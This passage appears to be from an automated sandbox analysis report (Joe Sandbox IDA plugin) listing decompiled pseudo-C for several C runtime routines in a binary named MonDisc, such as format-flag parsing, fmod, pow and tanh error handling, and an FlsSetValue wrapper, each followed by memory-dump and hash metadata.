                              				 *((long long*)(_t132 + 0x20)) =  *((long long*)(_t132 + 0x20)) + 8;
                              				_t97 =  *( *((intOrPtr*)(_t132 + 0x20)) - 8);
                              				 *(_t132 + 0x34) = _t97;
                              				if (_t97 >= 0) goto 0x2c98e71a;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000004;
                              				 *(_t132 + 0x34) =  ~_t97;
                              				goto 0x2c98e76f;
                              				_t82 = _t100;
                              				if (_t100 == 0x20) goto 0x2c98e74d;
                              				if (_t82 == 0x23) goto 0x2c98e747;
                              				if (_t82 == 0x2b) goto 0x2c98e741;
                              				if (_t82 == 0x2d) goto 0x2c98e73b;
                              				if (_t82 != 0x30) goto 0x2c98e773;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000008;
                              				goto 0x2c98e773;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000004;
                              				goto 0x2c98e773;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000001;
                              				goto 0x2c98e773;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000020;
                              				goto 0x2c98e773;
                              				 *(_t132 + 0x30) =  *(_t132 + 0x30) | 0x00000002;
                              				goto 0x2c98e773;
                              				 *(_t132 + 0x30) = _t144;
                              				 *((intOrPtr*)(_t132 + 0x40)) = sil;
                              				 *(_t132 + 0x38) = _t102;
                              				 *((intOrPtr*)(_t132 + 0x3c)) = 0;
                              				 *((intOrPtr*)(_t132 + 0x54)) = sil;
                              				goto 0x2c98e773;
                              				if (E00007FF67FF62C990258(_t132) == 0) goto 0x2c98e7cf;
                              				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))));
                              				 *((char*)(_t132 + 0x41)) = _t99;
                              				if (_t99 != 0) goto 0x2c98e62c;
                              				 *((long long*)(_t132 + 0x18)) =  *((long long*)(_t132 + 0x18)) + 1;
                              				if ( *((intOrPtr*)(_t132 + 0x2c)) == 0) goto 0x2c98e793;
                              				if ( *((intOrPtr*)(_t132 + 0x2c)) != 7) goto 0x2c98e7bf;
                              				 *((intOrPtr*)(_t132 + 0x470)) =  *((intOrPtr*)(_t132 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t132 + 0x470)) != 2) goto 0x2c98e621;
                              				return  *((intOrPtr*)(_t132 + 0x28));
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 0095a1f0982937b9620c8ccfdea1be70b52ebf803ae852666ba4312be0df93d2
                              • Instruction ID: 01026ffb124fd85dcca06296ca1f9430ef9491fccbbbe7e988da7b4aceed6399
                              • Opcode Fuzzy Hash: 0095a1f0982937b9620c8ccfdea1be70b52ebf803ae852666ba4312be0df93d2
                              • Instruction Fuzzy Hash: 1B618D7AD0C29286EF648F248C6453C37A9FB45FA8F545335D64EC329ACF28E441C706
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E3AC(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long _a8, long long _a16) {
                              				signed int _t9;
                              
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e3f1;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return _t9 | 0xffffffff;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: de4eb872028e4ab4c05b4c01f20d71709c4eec9a6ff6979106dcf8b51b761e3e
                              • Instruction ID: 990b861c18602e9c6ac39ea76a444488e95763bfeed27832c8a4811a559774a7
                              • Opcode Fuzzy Hash: de4eb872028e4ab4c05b4c01f20d71709c4eec9a6ff6979106dcf8b51b761e3e
                              • Instruction Fuzzy Hash: 7C617676D0C1968AEF648F248864B7D37A9EB15BA8F141335DA0EC72DBDF28E441C602
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 18%
                              			E00007FF67FF62C9B5B00(signed int __eax, void* __fp0, void* __rax, signed int __r8, signed int __r9) {
                              				long long _v120;
                              				long long _v136;
                              				intOrPtr _v144;
                              				void* _t10;
                              				void* _t11;
                              				void* _t13;
                              				void* _t14;
                              				void* _t15;
                              				void* _t20;
                              				void* _t22;
                              				long long _t26;
                              				void* _t29;
                              				void* _t30;
                              				signed long long _t32;
                              				signed long long _t33;
                              				void* _t34;
                              				signed long long _t36;
                              				signed long long _t37;
                              				signed long long _t39;
                              
                              				asm("movdqa [esp+0x50], xmm6");
                              				asm("movdqa [esp+0x60], xmm7");
                              				_t39 =  *0x2ca16ce0; // 0x7ff0000000000000
                              				asm("dec cx");
                              				asm("dec cx");
                              				_t32 = __r8 &  *0x2ca16d20;
                              				_t36 = __r9 &  *0x2ca16d20;
                              				_t14 = _t36 -  *0x2ca16ce0; // 0x7ff0000000000000
                              				if (_t14 > 0) goto 0x2c9b5db0;
                              				_t15 = _t32 -  *0x2ca16ce0; // 0x7ff0000000000000
                              				if (_t15 > 0) goto 0x2c9b5dc0;
                              				if (_t15 == 0) goto 0x2c9b5d50;
                              				if (_t36 == 0) goto 0x2c9b5da0;
                              				if (_t32 == _t36) goto 0x2c9b5d30;
                              				asm("dec cx");
                              				asm("dec cx");
                              				asm("movapd xmm4, xmm0");
                              				asm("movapd xmm5, xmm1");
                              				asm("movapd xmm3, [0x611a1]");
                              				_t33 = _t32 & _t39;
                              				_t37 = _t36 & _t39;
                              				asm("dec ecx");
                              				asm("dec ecx");
                              				if (_t33 == 0) goto 0x2c9b5ce0;
                              				if (_t37 == 0) goto 0x2c9b5ce0;
                              				_t34 = _t33 - _t37;
                              				_t20 = _t34 - 0x34;
                              				if (_t20 >= 0) goto 0x2c9b5ce0;
                              				asm("pand xmm4, xmm3");
                              				asm("pand xmm5, xmm3");
                              				asm("comisd xmm4, xmm5");
                              				if (_t20 <= 0) goto 0x2c9b5dc0;
                              				if (_t34 == 0x7ff) goto 0x2c9b5d50;
                              				asm("movapd xmm2, xmm4");
                              				asm("movapd xmm3, xmm5");
                              				asm("divsd xmm2, xmm3");
                              				asm("repne dec esp");
                              				asm("repne dec ecx");
                              				asm("dec cx");
                              				asm("dec ecx");
                              				_t22 = (_t37 &  *0x2ca16ce0) - 0x3ff + _t37 - 0x3ff - 0x3ff;
                              				if (_t22 >= 0) goto 0x2c9b5ce0;
                              				asm("movapd xmm4, [0x610d4]");
                              				asm("movapd xmm1, xmm5");
                              				asm("movapd xmm6, xmm2");
                              				asm("movapd xmm7, xmm2");
                              				asm("mulsd xmm7, xmm5");
                              				asm("andpd xmm1, xmm4");
                              				asm("andpd xmm2, xmm4");
                              				asm("subsd xmm5, xmm1");
                              				asm("subsd xmm6, xmm2");
                              				asm("movapd xmm4, xmm1");
                              				asm("mulsd xmm4, xmm2");
                              				asm("subsd xmm4, xmm7");
                              				asm("mulsd xmm1, xmm6");
                              				asm("addsd xmm4, xmm1");
                              				asm("mulsd xmm2, xmm5");
                              				asm("addsd xmm4, xmm2");
                              				asm("mulsd xmm6, xmm5");
                              				asm("addsd xmm6, xmm4");
                              				asm("movapd xmm1, xmm0");
                              				asm("pand xmm1, [0x610b4]");
                              				asm("movapd xmm2, xmm1");
                              				asm("subsd xmm1, xmm7");
                              				asm("subsd xmm2, xmm1");
                              				asm("subsd xmm2, xmm7");
                              				asm("subsd xmm2, xmm6");
                              				asm("addsd xmm2, xmm1");
                              				asm("comisd xmm2, [0x61074]");
                              				if (_t22 >= 0) goto 0x2c9b5ca0;
                              				asm("addsd xmm2, xmm3");
                              				asm("o16 nop [eax+eax]");
                              				asm("comisd xmm0, [0x61058]");
                              				if (_t22 > 0) goto 0x2c9b5cd0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm2");
                              				asm("orpd xmm0, [0x61014]");
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm2");
                              				goto 0x2c9b5dc0;
                              				asm("movsd [esp+0x30], xmm0");
                              				asm("movsd [esp+0x40], xmm1");
                              				st0 = __fp0;
                              				st1 = __fp0;
                              				_t26 = _v136;
                              				asm("fclex");
                              				asm("o16 nop [eax+eax]");
                              				asm("fprem");
                              				asm("fnstsw ax");
                              				if ((__eax & 0x00000400) == 0x400) goto 0x2c9b5d00;
                              				_v136 = _t26;
                              				_v120 = _t26;
                              				asm("movsd xmm0, [esp+0x30]");
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movsd xmm1, xmm0");
                              				asm("pand xmm1, [0x60f94]");
                              				asm("movsd xmm0, [0x60fbc]");
                              				asm("por xmm0, xmm1");
                              				goto 0x2c9b5dc0;
                              				asm("movapd xmm1, xmm0");
                              				asm("por xmm1, [0x60fb4]");
                              				asm("dec cx");
                              				r9d = 1;
                              				 *((intOrPtr*)(_t30 + 0x20)) = 8;
                              				_v144 = 0x21;
                              				_v120 = 2;
                              				_t10 = E00007FF67FF62C9D1074(__eax & 0x00000400, _t11, _t13, (__eax & 0x00000400) - 0x400, 0x2ca16cc0, _t29, _t34);
                              				goto 0x2c9b5dc0;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm1, [0x60f88]");
                              				goto 0x2c9b5d5c;
                              				asm("o16 nop [eax+eax]");
                              				asm("movapd xmm0, xmm1");
                              				asm("o16 nop [eax+eax]");
                              				asm("movdqa xmm7, [esp+0x60]");
                              				asm("movdqa xmm6, [esp+0x50]");
                              				return _t10;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: !$fmod
                              • API String ID: 1757819995-3213614193
                              • Opcode ID: dd20ec4e41a49b05fd555289c17bf3de0b93b3d296956557c896eca9cbca0f6d
                              • Instruction ID: cebe3c65fb240d5b1c7c0a6f3995ee0f354ff43d1eeae1818df11e2eb16e0ec0
                              • Opcode Fuzzy Hash: dd20ec4e41a49b05fd555289c17bf3de0b93b3d296956557c896eca9cbca0f6d
                              • Instruction Fuzzy Hash: E3512911D2CF8185EA639B39EC157B96668FFA23D0F409733F90DB15A2DF5DA0038641
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E00007FF67FF62C9D0170(void* __eax, void* __ecx, void* __rdi, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a80) {
                              				void* _v40;
                              				intOrPtr _v56;
                              				intOrPtr _v80;
                              				intOrPtr _v88;
                              				void* _t18;
                              				void* _t21;
                              				void* _t22;
                              				void* _t24;
                              				void* _t27;
                              				void* _t30;
                              
                              				asm("movaps [esp+0x60], xmm6");
                              				asm("movaps xmm6, xmm2");
                              				_t22 = r9d - 2;
                              				if (_t22 == 0) goto 0x2c9d0248;
                              				if (_t22 <= 0) goto 0x2c9d0287;
                              				if (r9d - 5 <= 0) goto 0x2c9d022f;
                              				_t24 = r9d - 6;
                              				if (_t24 == 0) goto 0x2c9d0207;
                              				if (_t24 <= 0) goto 0x2c9d0287;
                              				if (r9d - 8 <= 0) goto 0x2c9d01df;
                              				if (r9d != 9) goto 0x2c9d0287;
                              				_v56 = 2;
                              				_t2 = _t27 + 1; // 0x3
                              				r9d = _t2;
                              				asm("movsd [esp+0x38], xmm1");
                              				asm("movsd [esp+0x30], xmm0");
                              				_v80 = 0x22;
                              				_v88 = 0x11;
                              				goto 0x2c9d026b;
                              				_v56 = 2;
                              				r9d = 4;
                              				asm("movsd [esp+0x38], xmm1");
                              				asm("movsd [esp+0x30], xmm0");
                              				_v80 = 0x22;
                              				_v88 = 0x12;
                              				goto 0x2c9d026b;
                              				_v56 = 2;
                              				r9d = 1;
                              				asm("movsd [esp+0x38], xmm1");
                              				asm("movsd [esp+0x30], xmm0");
                              				_v80 = 0x21;
                              				_v88 = 8;
                              				goto 0x2c9d026b;
                              				asm("movsd [esp+0x50], xmm6");
                              				asm("movaps xmm6, [esp+0x60]");
                              				goto E00007FF67FF62C9D12D0;
                              				_a64 = 2;
                              				r9d = 2;
                              				asm("movsd [esp+0x38], xmm1");
                              				asm("movsd [esp+0x30], xmm0");
                              				_a40 = 0x22;
                              				_a32 = 4;
                              				asm("movsd [esp+0x50], xmm6");
                              				_t18 = E00007FF67FF62C9D1074(2, __ecx, _t21, r9d - 9, 0x2ca1a8c8, _t30, _a80);
                              				asm("movaps xmm0, xmm6");
                              				asm("movaps xmm6, [esp+0x60]");
                              				return _t18;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: "$pow
                              • API String ID: 1757819995-713443511
                              • Opcode ID: d57dd57d50b79a1aca57c8340f739250ddbdc7e636d880c81068914ca528759b
                              • Instruction ID: 4dbe11ae641c39fd2fe5a3e732f728d8c174c59fe7419a7e27a5b8a1163953f5
                              • Opcode Fuzzy Hash: d57dd57d50b79a1aca57c8340f739250ddbdc7e636d880c81068914ca528759b
                              • Instruction Fuzzy Hash: 96217E72D1CAC487D770DF50E84066AAAA0FBDA3A4F202325F38A56956CFBDD1819B01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 38%
                              			E00007FF67FF62C9D1C18(void* __eax, char __ecx, void* __rcx, void* __rdx, void* __rsi, void* __r8, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				char _v56;
                              				void* __rbx;
                              				void* _t28;
                              				void* _t32;
                              				void* _t37;
                              				long long _t47;
                              				void* _t48;
                              				void* _t56;
                              				void* _t57;
                              
                              				_t55 = __rsi;
                              				_t54 = __rdx;
                              				asm("movsd [esp+0x20], xmm3");
                              				asm("movsd [esp+0x18], xmm2");
                              				_push(_t48);
                              				_t57 = _t56 - 0x50;
                              				r8d = 0;
                              				if ( *0x2ca1c740 == _t37) goto 0x2c9d1c53;
                              				r8d = r8d + 1;
                              				if (0x7ff62ca1c750 - 0x2ca1c910 < 0) goto 0x2c9d1c38;
                              				goto 0x2c9d1c5e;
                              				_t47 =  *((intOrPtr*)(0x2ca1c740 + 8 + (r8d + r8d) * 8));
                              				 *((long long*)(_t57 + 0x28)) = _t47;
                              				if (_t47 == 0) goto 0x2c9d1cd1;
                              				_v40 =  *((intOrPtr*)(_t57 + 0x70));
                              				_v36 = _a28;
                              				_v32 = _a32;
                              				_v28 = _a36;
                              				_v24 = _a40;
                              				_v20 = _a44;
                              				_v56 = __ecx;
                              				_t28 = E00007FF67FF62C9D0EA0(__ecx, _t47, _t48, _a48, __rdx, __rsi);
                              				_t53 =  &_v56;
                              				if (E00007FF67FF62C9BFDE0(_t28,  &_v56) != 0) goto 0x2c9d1cc9;
                              				E00007FF67FF62C9D1BE8( &_v56);
                              				asm("movsd xmm0, [esp+0x40]");
                              				goto 0x2c9d1ce6;
                              				E00007FF67FF62C9D0EA0(__ecx, _t47, _t48,  &_v56, _t54, _t55);
                              				_t32 = E00007FF67FF62C9D1BE8(_t53);
                              				asm("movsd xmm0, [esp+0x80]");
                              				return _t32;
                              			}


















                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c1e
                              0x7ff62c9d1c24
                              0x7ff62c9d1c25
                              0x7ff62c9d1c35
                              0x7ff62c9d1c3a
                              0x7ff62c9d1c3c
                              0x7ff62c9d1c4d
                              0x7ff62c9d1c51
                              0x7ff62c9d1c59
                              0x7ff62c9d1c6b
                              0x7ff62c9d1c73
                              0x7ff62c9d1c79
                              0x7ff62c9d1c81
                              0x7ff62c9d1c89
                              0x7ff62c9d1c91
                              0x7ff62c9d1c9c
                              0x7ff62c9d1ca7
                              0x7ff62c9d1cab
                              0x7ff62c9d1caf
                              0x7ff62c9d1cb4
                              0x7ff62c9d1cc0
                              0x7ff62c9d1cc4
                              0x7ff62c9d1cc9
                              0x7ff62c9d1ccf
                              0x7ff62c9d1cd1
                              0x7ff62c9d1cd8
                              0x7ff62c9d1cdd
                              0x7ff62c9d1ceb

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_errno_from_matherr
                              • String ID: tanh
                              • API String ID: 1187470696-874243715
                              • Opcode ID: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction ID: 22f75391b1fdad1aa6bd86d72f32734317ed1291106597d9759dc7b7b5dcd8ee
                              • Opcode Fuzzy Hash: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction Fuzzy Hash: CB211036E1C6458BEB60DF28A84016A73A0FB8D360F505535F68DE2B5AEF3CD4008F01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E00007FF67FF62C9C6F60(void* __eax, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
                              				void* _t4;
                              				void* _t7;
                              				void* _t11;
                              				void* _t22;
                              
                              				_a8 = __rbx;
                              				_t4 = E00007FF67FF62C9C670C(_t7, 6, _t11, __rax, __rdx, "FlsSetValue", _t22, 0x2ca177f0, 0x2ca177f8);
                              				if (__rax == 0) goto 0x2c9c6fa0;
                              				E00007FF67FF62C9EE410(_t4, __rax);
                              				goto 0x2c9c6fa6;
                              				return TlsSetValue(??, ??);
                              			}







                              0x7ff62c9c6f60
                              0x7ff62c9c6f89
                              0x7ff62c9c6f96
                              0x7ff62c9c6f98
                              0x7ff62c9c6f9e
                              0x7ff62c9c6fb0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Valuetry_get_function
                              • String ID: FlsSetValue
                              • API String ID: 738293619-3750699315
                              Uniqueness

                              Uniqueness Score: -1.00%